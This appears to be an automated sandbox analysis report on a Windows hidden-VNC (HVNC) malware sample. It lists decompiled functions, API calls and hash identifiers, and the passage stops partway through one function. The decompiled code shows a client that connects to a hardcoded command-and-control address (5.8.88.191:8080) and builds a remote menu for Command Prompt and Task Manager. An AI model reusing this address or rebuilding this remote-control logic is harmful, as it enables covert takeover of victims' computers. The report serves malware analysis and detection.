0x00c78a5a
0x00c78a6f
0x00c78a73
0x00c78a73
0x00c78a77
0x00c78a7d
0x00c78a84
0x00000000
0x00000000
0x00c78a8a
0x00c78a8d
0x00c78a92
0x00c78a9e
0x00c78aa4
0x00c78aab
0x00000000
0x00000000
0x00c78ab4
0x00c78be2
0x00c78be8
0x00c78bec
0x00c78bef
0x00000000
0x00000000
0x00c78bf5
0x00c78bfb
0x00c78bfe
0x00c78c06
0x00c78c0c
0x00c78c10
0x00c78c13
0x00000000
0x00000000
0x00c78c19
0x00c78c20
0x00c78c20
0x00c78c23
0x00c78c25
0x00000000
0x00c78c25
0x00c78aba
0x00c78ac6
0x00c78adb
0x00c78ae1
0x00c78aef
0x00c78af2
0x00c78afb
0x00c78aff
0x00c78aff
0x00c78b03
0x00c78b09
0x00c78b10
0x00000000
0x00000000
0x00c78b12
0x00c78b15
0x00c78b1a
0x00c78b24
0x00c78b2a
0x00c78b31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetUserObjectInformationA.USER32 ref: 00C788E6
CreateEventA.KERNEL32 ref: 00C789E5
CreateEventA.KERNEL32 ref: 00C78A08
CreateMutexExA.KERNEL32 ref: 00C78A27
GetLastError.KERNEL32 ref: 00C78A46
CreateFileMappingA.KERNEL32 ref: 00C78A77
MapViewOfFile.KERNEL32 ref: 00C78A9E
lstrcpyA.KERNEL32 ref: 00C78ADB
CreateFileMappingA.KERNEL32 ref: 00C78B03
MapViewOfFile.KERNEL32 ref: 00C78B24
GetLastError.KERNEL32 ref: 00C78B37
HeapFree.KERNEL32 ref: 00C78B5C
HeapFree.KERNEL32 ref: 00C78B73
HeapFree.KERNEL32 ref: 00C78B8A
HeapFree.KERNEL32 ref: 00C78BA1
HeapFree.KERNEL32 ref: 00C78BB8

Part of subcall function 00C77E6C: lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EBD
Part of subcall function 00C77E6C: lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77ECD
Part of subcall function 00C77E6C: HeapAlloc.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EE1
Part of subcall function 00C77E6C: lstrcpyA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EFD
Part of subcall function 00C77E6C: lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F09
Part of subcall function 00C77E6C: lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F1A
Part of subcall function 00C77E6C: HeapFree.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F2C

OpenFileMappingA.KERNEL32 ref: 00C78BE2
MapViewOfFile.KERNEL32 ref: 00C78C06

Strings

Local\, xrefs: 00C78906, 00C78926, 00C78949, 00C7896C, 00C78994, 00C789B8

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$FileFree$Create$MappingView$ErrorEventLastlstrcatlstrcpylstrlen$AllocInformationMutexObjectOpenUser
String ID: Local\
API String ID: 1659859712-422136742
Opcode ID: 9c8354012493da1887db23aa19ff77b1d37d01d5690f2e67cd0a2aada56197b5
Instruction ID: b571c27b1748a0a14084f1bdbb4d0d8e18d66e2791372ad877ece822e2c2a674
Opcode Fuzzy Hash: 9c8354012493da1887db23aa19ff77b1d37d01d5690f2e67cd0a2aada56197b5
Instruction Fuzzy Hash: F5919E76211B9182FB21DF21E854F5A33A0FB88B98F8496259F5D07F54EF38CA49CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B070, Relevance: 12.1, APIs: 8, Instructions: 94networkmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C6AF40: lstrlenA.KERNEL32(?,?,?,00C6B0A4), ref: 00C6AF5C
Part of subcall function 00C6AF40: HeapAlloc.KERNEL32(?,?,?,00C6B0A4), ref: 00C6AF79
Part of subcall function 00C6AF40: memset.NTDLL(?,?,?,00C6B0A4), ref: 00C6AF8F
Part of subcall function 00C6AF40: memcpy.NTDLL(?,?,?,00C6B0A4), ref: 00C6AFAC

socket.WS2_32 ref: 00C6B0BF
connect.WS2_32 ref: 00C6B0DE
setsockopt.WS2_32 ref: 00C6B10B

Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C864
Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C885

send.WS2_32 ref: 00C6B12E
recv.WS2_32 ref: 00C6B147
shutdown.WS2_32 ref: 00C6B19B
closesocket.WS2_32 ref: 00C6B1A4
HeapFree.KERNEL32 ref: 00C6B1BA

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: setsockopt$Heap$AllocFreeclosesocketconnectlstrlenmemcpymemsetrecvsendshutdownsocket
String ID:
API String ID: 1992057409-0
Opcode ID: ad95164e015f8c862a0bb2ff8f59ef57e7156f7253df4f202161e903d2998c8d
Instruction ID: dfba67421a1a065a6ea7c6b7a4e9e00b8cc6bd9d7f2ce456b6e8e065de1ce5ac
Opcode Fuzzy Hash: ad95164e015f8c862a0bb2ff8f59ef57e7156f7253df4f202161e903d2998c8d
Instruction Fuzzy Hash: C1419F322117808AEB209F16E85072E7761FB85FA0F548325DA6A87B94DF3CD985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A002, Relevance: 1.8, APIs: 1, Instructions: 265libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL ref: 00C9A0F5

Memory Dump Source

Source File: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Offset: 00C9A000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 7fe431076db23cde40edc4675af80308f1a6a74ece7063cc91be67dba04bc9d2
Instruction ID: 2f7ea8ce1785c3186aba941557cbc6ebb7c88be10281800a9d6ef333b415792a
Opcode Fuzzy Hash: 7fe431076db23cde40edc4675af80308f1a6a74ece7063cc91be67dba04bc9d2
Instruction Fuzzy Hash: C681D53121CB898FDB29DF28D8967A577E0FF56314F0405AEC88BC7252E634D5468783

Uniqueness

Uniqueness Score: -1.00%

Function 00C61FB0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 99
networkthreadmemoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			_entry_(void* __edx, void* __esi, void* __ebp, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rbp, void* __r8, void* __r9, void* __r10, void* __r14, long long _a8, char _a16) {
				void* _v424;
				char _v696;
				char _v712;
				long long _v728;
				void* __rsi;
				signed int _t12;
				intOrPtr _t14;
				intOrPtr _t24;
				void* _t25;
				void* _t35;
				void* _t40;
				void* _t42;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t58;
				intOrPtr _t59;
				void* _t69;

				_t74 = __r8;
				_t70 = __rbp;
				_t68 = __rdi;
				_t53 = __rbx;
				_t51 = __rax;
				_t45 = __ebp;
				_a8 = __rbx;
				if(__edx == 0) {
					asm("lock xadd [0x3353e], eax");
					__eflags = (_t12 | 0xffffffff) - 1;
					if((_t12 | 0xffffffff) == 1) {
						__eflags =  *0xc9564c; // 0x1
						if(__eflags != 0) {
							_t59 =  *0xc95650; // 0x20dcd802190
							__eflags = _t59;
							if(_t59 != 0) {
								E00C68D58(_t59);
							}
						}
						__eflags =  *0xc95660; // 0x1
						if(__eflags != 0) {
							_t56 =  *0xc956a0; // 0x1b8
							__eflags = _t56;
							if(_t56 != 0) {
								SetEvent();
								E00C62820(_t56, _t68);
								E00C6872C(_t35, _t45, _t69, _t74);
								E00C63F5C(0xc956c8);
								E00C62604();
								_t58 =  *0xc95658; // 0x20dcbdd0000
								__eflags = _t58;
								if(_t58 != 0) {
									HeapDestroy();
								}
							}
						}
					}
					L22:
					_t14 =  *0xc95660; // 0x1
					return _t14;
				}
				_t40 = __edx - 1;
				if(_t40 == 0) {
					asm("lock xadd [0x33625], eax");
					__eflags = 2 - 1;
					if(2 != 1) {
						goto L22;
					}
					 *0xc95688 = __rcx;
					_t24 = E00C61E98(__esi, __ebp, __rax, __rbx, __rcx, __r8, _t69, __rbp, __r8, __r9, __r10, __r14);
					__eflags = _t24;
					if(_t24 != 0) {
						__eflags = _t24 - 2;
						if(_t24 != 2) {
							 *0xc95660 = 0;
						} else {
							__imp__#115(); // executed
							_v712 = 2;
							_v728 =  &_a16;
							r8d = 0;
							_a16 = 0x10;
							__imp__WSAStringToAddressW(); // executed
							_t25 = E00C62188();
							r8d = E00C621B4( &_a16);
							r9d = _t25;
							wsprintfA(??, ??);
							E00C68BCC(_t53, 0xc95650,  &_v712, __rdi, _t69, __rbp,  &_v696,  &_v712);
							 *0xc95660 = 1;
							 *0xc9564c = 1;
							__imp__#116();
						}
					} else {
						 *0xc95660 = 1;
						L7:
						E00C6A200(GetCurrentThreadId(), _t51, _t53, _t69, _t70);
					}
					goto L22;
				}
				_t42 = _t40 - 1;
				if(_t42 == 0) {
					__eflags =  *0xc9564c; // 0x1
					if(__eflags != 0) {
						goto L22;
					}
					goto L7;
				} else {
					if(_t42 == 1) {
						_t50 =  *0xc9564c; // 0x1
						if(_t50 == 0) {
							E00C6A334(GetCurrentThreadId(), __rbx, _t69);
						}
					}
					goto L22;
				}
			}

0x00c61fb0
0x00c61fb0
0x00c61fb0
0x00c61fb0
0x00c61fb0
0x00c61fb0
0x00c61fb0
0x00c61fc1
0x00c62102
0x00c6210a
0x00c6210d
0x00c6210f
0x00c62115
0x00c62117
0x00c6211e
0x00c62121
0x00c62123
0x00c62123
0x00c62121
0x00c62128
0x00c6212e
0x00c62130
0x00c62137
0x00c6213a
0x00c6213c
0x00c62142
0x00c62147
0x00c62153
0x00c62158
0x00c6215d
0x00c62164
0x00c62167
0x00c62169
0x00c62169
0x00c62167
0x00c6213a
0x00c6212e
0x00c6216f
0x00c6216f
0x00c62185
0x00c62185
0x00c61fc7
0x00c61fca
0x00c6201b
0x00c62025
0x00c62028
0x00000000
0x00000000
0x00c62031
0x00c62038
0x00c6203d
0x00c6203f
0x00c62052
0x00c62054
0x00c620f7
0x00c6205a
0x00c62067
0x00c62075
0x00c6207f
0x00c62084
0x00c62087
0x00c6209b
0x00c620a1
0x00c620ad
0x00c620b7
0x00c620bf
0x00c620d6
0x00c620db
0x00c620e5
0x00c620ef
0x00c620ef
0x00c62041
0x00c62041
0x00c62004
0x00c6200c
0x00c6200c
0x00000000
0x00c6203f
0x00c61fcc
0x00c61fcf
0x00c61ff8
0x00c61ffe
0x00000000
0x00000000
0x00000000
0x00c61fd1
0x00c61fd4
0x00c61fda
0x00c61fe0
0x00c61fee
0x00c61fee
0x00c61fe0
0x00000000
0x00c61fd4

APIs

GetCurrentThreadId.KERNEL32 ref: 00C61FE6

Part of subcall function 00C6A334: EnterCriticalSection.KERNEL32(?,?,?,00C61FF3), ref: 00C6A350
Part of subcall function 00C6A334: LeaveCriticalSection.KERNEL32(?,?,?,00C61FF3), ref: 00C6A38F
Part of subcall function 00C6A334: UnhookWindowsHookEx.USER32 ref: 00C6A3A3
Part of subcall function 00C6A334: HeapFree.KERNEL32(?,?,?,00C61FF3), ref: 00C6A3B5

GetCurrentThreadId.KERNEL32 ref: 00C62004
WSAStartup.WS2_32 ref: 00C62067
WSAStringToAddressW.WS2_32 ref: 00C6209B
wsprintfA.USER32 ref: 00C620BF
WSACleanup.WS2_32 ref: 00C620EF
SetEvent.KERNEL32 ref: 00C6213C
HeapDestroy.KERNEL32 ref: 00C62169

Strings

H21HVNC-CLIENT-%08X%08X, xrefs: 00C620B0
5.8.88.191:8080, xrefs: 00C62094

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalCurrentHeapSectionThread$AddressCleanupDestroyEnterEventFreeHookLeaveStartupStringUnhookWindowswsprintf
String ID: 5.8.88.191:8080$H21HVNC-CLIENT-%08X%08X
API String ID: 940211779-3601121346
Opcode ID: 4445535575f36f4d353b80ea04d066e39caac2832ed3f690e63d520ad962ed29
Instruction ID: f13b640dfef93e89f1f478cb1c1451515bfc182dce3d8f192a3f4859d6b637e5
Opcode Fuzzy Hash: 4445535575f36f4d353b80ea04d066e39caac2832ed3f690e63d520ad962ed29
Instruction Fuzzy Hash: 60418031609E41C6FB31AF60E8D8F6D3320FB82751F844226EA2642B69DF3DC948DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00C78C54, Relevance: 10.5, APIs: 7, Instructions: 41fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C66
CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78C7A
UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C8E
CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CA2
FindCloseChangeNotification.KERNELBASE(?,?,?,00C78B4B), ref: 00C78CB6
CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CC9
CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CDC

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Close$Handle$FileUnmapView$ChangeFindNotification
String ID:
API String ID: 326854797-0
Opcode ID: 18708f6b5fa98c8f5083f05552644dd29c4abc091f2fbbf85d348f0453886eb6
Instruction ID: be35cc68409e50587fbaf8ff719464c1d2f1df86d739c7e7f9ed89fb5365707c
Opcode Fuzzy Hash: 18708f6b5fa98c8f5083f05552644dd29c4abc091f2fbbf85d348f0453886eb6
Instruction Fuzzy Hash: BC11ED26253B0486FF2ADFA1D4697392360FF88F49F588705CB1A4A518CF79C59CC3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C61E98, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00C61E98(void* __esi, void* __ebp, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, void* __r10, void* __r14, long long _a8, long long _a16) {
				void* __rdi;
				signed int _t10;
				signed int _t11;
				signed int _t12;
				signed int _t13;
				signed int _t17;
				void* _t23;
				void* _t24;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t56;
				void* _t58;
				void* _t59;

				_t59 = __r14;
				_t58 = __r10;
				_t57 = __r9;
				_t56 = __r8;
				_t52 = __rbp;
				_t38 = __rbx;
				_t25 = __ebp;
				_t24 = __esi;
				_a8 = __rbx;
				_a16 = __rsi;
				_t48 = __rdx;
				_t50 = __rcx;
				r8d = 0; // executed
				HeapCreate(??, ??, ??); // executed
				 *0xc95658 = __rax;
				if(__rax == 0) {
					L11:
					_t17 = GetLastError();
					L12:
					return _t17;
				}
				_t10 = E00C6250C(0x1b, __ebp, __rax, __rbx, __rcx, __rcx, __rbp, __r9);
				_t17 = _t10;
				if(_t10 == 0) {
					_t11 = E00C629B8(__rax, _t38, _t50);
					_t17 = _t11;
					if(_t11 == 0) {
						E00C63F74(); // executed
						 *0xc955e0 = E00C63710;
						 *0xc955e8 = E00C63748;
						 *0xc955f0 = E00C63780;
						 *0xc955f8 = E00C63A18;
						_t12 = E00C687CC(_t24, _t25, E00C63A18, _t38, _t50, _t48, _t50, _t56, _t58, _t59);
						_t17 = _t12;
						if(_t12 == 0) {
							_t13 = E00C617CC(1, _t23, _t25, E00C63A18, _t38, _t48, _t50, _t52, _t57);
							_t17 = _t13;
							if((_t13 & 0xfffffffd) == 0) {
								_t17 = E00C684EC(0, _t24, _t25, E00C63A18, _t38, _t47, _t52, _t57);
								E00C6A3D4();
							}
						} else {
							if(_t12 == 2) {
								E00C617CC(0, _t23, _t25, E00C63A18, _t38, _t48, _t50, _t52, _t57);
							}
						}
					}
				}
				if(_t17 != 0xffffffff) {
					goto L12;
				}
				goto L11;
			}

0x00c61e98
0x00c61e98
0x00c61e98
0x00c61e98
0x00c61e98
0x00c61e98
0x00c61e98
0x00c61e98
0x00c61e98
0x00c61e9d
0x00c61ea7
0x00c61eaa
0x00c61eb4
0x00c61eb7
0x00c61ebd
0x00c61ec7
0x00c61f94
0x00c61f9a
0x00c61f9c
0x00c61fad
0x00c61fad
0x00c61ed5
0x00c61eda
0x00c61ede
0x00c61ee4
0x00c61ee9
0x00c61eed
0x00c61f11
0x00c61f20
0x00c61f2e
0x00c61f3c
0x00c61f4a
0x00c61f51
0x00c61f56
0x00c61f5a
0x00c61f75
0x00c61f7a
0x00c61f81
0x00c61f88
0x00c61f8a
0x00c61f8a
0x00c61f5c
0x00c61f5f
0x00c61f66
0x00c61f66
0x00c61f5f
0x00c61f5a
0x00c61eed
0x00c61f92
0x00000000
0x00000000
0x00000000

APIs

HeapCreate.KERNELBASE(?,?,?,00C6203D), ref: 00C61EB7
GetLastError.KERNEL32(?,?,?,00C6203D), ref: 00C61F94

Part of subcall function 00C6250C: GetModuleHandleA.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62523
Part of subcall function 00C6250C: GetVersion.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62536
Part of subcall function 00C6250C: GetCurrentProcessId.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62548
Part of subcall function 00C6250C: StrRChrA.SHLWAPI(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625A2
Part of subcall function 00C6250C: CreateEventA.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625D2
Part of subcall function 00C6250C: GetLastError.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625E4

Part of subcall function 00C629B8: InitializeCriticalSection.KERNEL32(?,?,?,00C61EE9,?,?,?,00C6203D), ref: 00C629E8
Part of subcall function 00C629B8: InitializeCriticalSection.KERNEL32(?,?,?,00C61EE9,?,?,?,00C6203D), ref: 00C62A0A
Part of subcall function 00C629B8: GetModuleHandleA.KERNEL32(?,?,?,00C61EE9,?,?,?,00C6203D), ref: 00C62A35

Part of subcall function 00C684EC: GetCurrentProcess.KERNEL32(?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C68614

Part of subcall function 00C6A3D4: InitializeCriticalSection.KERNEL32(?,?,?,?,00C61F8F,?,?,?,00C6203D), ref: 00C6A3F4

Strings

S:(ML;;NW;;;LW), xrefs: 00C61F01
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00C61F0A

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalInitializeSection$CreateCurrentErrorHandleLastModuleProcess$EventHeapVersion
String ID: D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$S:(ML;;NW;;;LW)
API String ID: 3923076295-981555273
Opcode ID: 190fbfa328c60ce37192520c7de7bb3674701d52fd0dab3a44fb5d5f97ae2d83
Instruction ID: 0a9a7cc8202e7faac9e1ee2f387ad1476aec0024630b9cbf26b3f6a1d0070df2
Opcode Fuzzy Hash: 190fbfa328c60ce37192520c7de7bb3674701d52fd0dab3a44fb5d5f97ae2d83
Instruction Fuzzy Hash: E421C224300F4246FB71E7A5B8D472933A5AB48791F9C4321ED2983766EF38C5458306

Uniqueness

Uniqueness Score: -1.00%

Function 00C6C7B8, Relevance: 6.0, APIs: 4, Instructions: 40
threadCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00C6C7B8(void* __ecx, void* __edx, long long __rax, long long __rbx, long long* __rcx, void* __r8, void* __r9, long long _a8) {
				signed long long _v16;
				signed int _v24;
				signed int _t14;
				signed int _t19;
				long long* _t35;
				void* _t36;

				_a8 = __rbx;
				_t35 = __rcx;
				_t14 = E00C7FA64(__ecx, __edx, __rax, _t36, __r8, __r9);
				_t19 = _t14;
				if(_t14 != 0) {
					L4:
					if(_t19 == 0xffffffff) {
						_t19 = GetLastError();
					}
					L6:
					return _t19;
				}
				 *((long long*)(_t35 + 8)) = _t35;
				 *_t35 = _t35;
				InitializeCriticalSection(??);
				r9d = 0;
				r8d = 0;
				CreateEventA(??, ??, ??, ??);
				 *((long long*)(_t35 + 0x60)) = __rax;
				if(__rax == 0) {
					goto L6;
				}
				_v16 = _v16 & 0x00000000;
				_v24 = _v24 & _t19;
				CreateThread(??, ??, ??, ??, ??, ??); // executed
				 *((long long*)(_t35 + 0x58)) = __rax;
				if(__rax == 0) {
					goto L6;
				}
				_t19 =  *(_t35 + 0x68);
				goto L4;
			}

0x00c6c7b8
0x00c6c7c2
0x00c6c7c5
0x00c6c7ca
0x00c6c7ce
0x00c6c825
0x00c6c828
0x00c6c830
0x00c6c830
0x00c6c832
0x00c6c83e
0x00c6c83e
0x00c6c7d4
0x00c6c7d8
0x00c6c7db
0x00c6c7e1
0x00c6c7e7
0x00c6c7ec
0x00c6c7f2
0x00c6c7f9
0x00000000
0x00000000
0x00c6c7fb
0x00c6c808
0x00c6c813
0x00c6c819
0x00c6c820
0x00000000
0x00000000
0x00c6c822
0x00000000

APIs

Part of subcall function 00C7FA64: InitializeCriticalSection.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA71
Part of subcall function 00C7FA64: GetModuleHandleA.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA7E
Part of subcall function 00C7FA64: GetProcAddress.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA8E

InitializeCriticalSection.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C7DB
CreateEventA.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C7EC
CreateThread.KERNELBASE ref: 00C6C813
GetLastError.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C82A

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateCriticalInitializeSection$AddressErrorEventHandleLastModuleProcThread
String ID:
API String ID: 4241923591-0
Opcode ID: 7b2fa552339222a825177e9a5a635de3c053b6a4e2871eadb985d273e0797acb
Instruction ID: 8a33fbf64e42e0dcb73bc0870cff259b36b6c40e1859438e47c23dee0636b614
Opcode Fuzzy Hash: 7b2fa552339222a825177e9a5a635de3c053b6a4e2871eadb985d273e0797acb
Instruction Fuzzy Hash: F1019632200B4183EB308B65E5D4B6973A0FB4C364F948228CBA847A95EF38C9A8C704

Uniqueness

Uniqueness Score: -1.00%

Function 00C64588, Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,0000001B,00C6258A,?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C645C5
GetLastError.KERNEL32(?,?,0000001B,00C6258A,?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C64600

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastModuleName
String ID:
API String ID: 2776309574-0
Opcode ID: 50b49585d9c40428764c95c644c859d0c54c4bc467d27369983c26f490315a6b
Instruction ID: acd6fa02f93f5310842b02004a5925a8f14fc231ed1914be829b0fb4720c4622
Opcode Fuzzy Hash: 50b49585d9c40428764c95c644c859d0c54c4bc467d27369983c26f490315a6b
Instruction Fuzzy Hash: BB01D831304B9082EE39AB5ABAD436AB595BB46FD0F0C4435FF9947B05EE7ACD418780

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C7B420, Relevance: 57.9, APIs: 19, Strings: 14, Instructions: 108windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32(?,?,?,?,?,?,?,00C7B289), ref: 00C7B43C
AppendMenuA.USER32 ref: 00C7B45E
AppendMenuA.USER32 ref: 00C7B474
AppendMenuA.USER32 ref: 00C7B48A
AppendMenuA.USER32 ref: 00C7B4A0
AppendMenuA.USER32 ref: 00C7B4B6
AppendMenuA.USER32 ref: 00C7B4CC
AppendMenuA.USER32 ref: 00C7B4E2
AppendMenuA.USER32 ref: 00C7B4F8
AppendMenuA.USER32 ref: 00C7B50C
AppendMenuA.USER32 ref: 00C7B522
AppendMenuA.USER32 ref: 00C7B538
AppendMenuA.USER32 ref: 00C7B54E
AppendMenuA.USER32 ref: 00C7B562
AppendMenuA.USER32 ref: 00C7B578
AppendMenuA.USER32 ref: 00C7B58E
AppendMenuA.USER32 ref: 00C7B5A4
TrackPopupMenu.USER32 ref: 00C7B5C8
DestroyMenu.USER32 ref: 00C7B5D1

Strings

System, xrefs: 00C7B492
Programs and Features, xrefs: 00C7B450
Power Options, xrefs: 00C7B466
Logoff, xrefs: 00C7B596
Control Panel, xrefs: 00C7B52A
File Explorer, xrefs: 00C7B540
Restart, xrefs: 00C7B580
Shutdown, xrefs: 00C7B56A
Device Manager, xrefs: 00C7B4A8
Event Viewer, xrefs: 00C7B47C
Command Prompt, xrefs: 00C7B4EA
Computer Management, xrefs: 00C7B4D4
Disk Management, xrefs: 00C7B4BE
Task Manager, xrefs: 00C7B514

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Menu$Append$Popup$CreateDestroyTrack
String ID: Command Prompt$Computer Management$Control Panel$Device Manager$Disk Management$Event Viewer$File Explorer$Logoff$Power Options$Programs and Features$Restart$Shutdown$System$Task Manager
API String ID: 761734086-3197270845
Opcode ID: d87a8b716d9bf3227b42885cfd3b6b59b85f573c63d3b2b15c88234e7f8892c2
Instruction ID: 6d87535c14294db01688e747de7bb5b06ea046a921d20c037b1f124ca4851555
Opcode Fuzzy Hash: d87a8b716d9bf3227b42885cfd3b6b59b85f573c63d3b2b15c88234e7f8892c2
Instruction Fuzzy Hash: AB51EC7561091492F715DF26E818F9A33F2FB89B51FD99532E90607E28CF388999CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B36C, Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 272
memorythreadnetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 21%

			E00C6B36C(void* __edx, void* __edi, void* __esi, long long __rcx, void* __r11, char _a8, char _a16, char _a24, char _a32) {
				long _v86;
				char _v88;
				long _v92;
				char _v104;
				long _v108;
				char _v112;
				char _v116;
				signed int _v120;
				char _v128;
				long _v132;
				signed int _v136;
				signed long long _v144;
				long _v152;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t83;
				void* _t85;
				void* _t87;
				long _t97;
				long _t98;
				void* _t120;
				void* _t121;
				long _t122;
				signed long long _t133;
				void* _t135;
				signed long long* _t158;
				long long _t179;
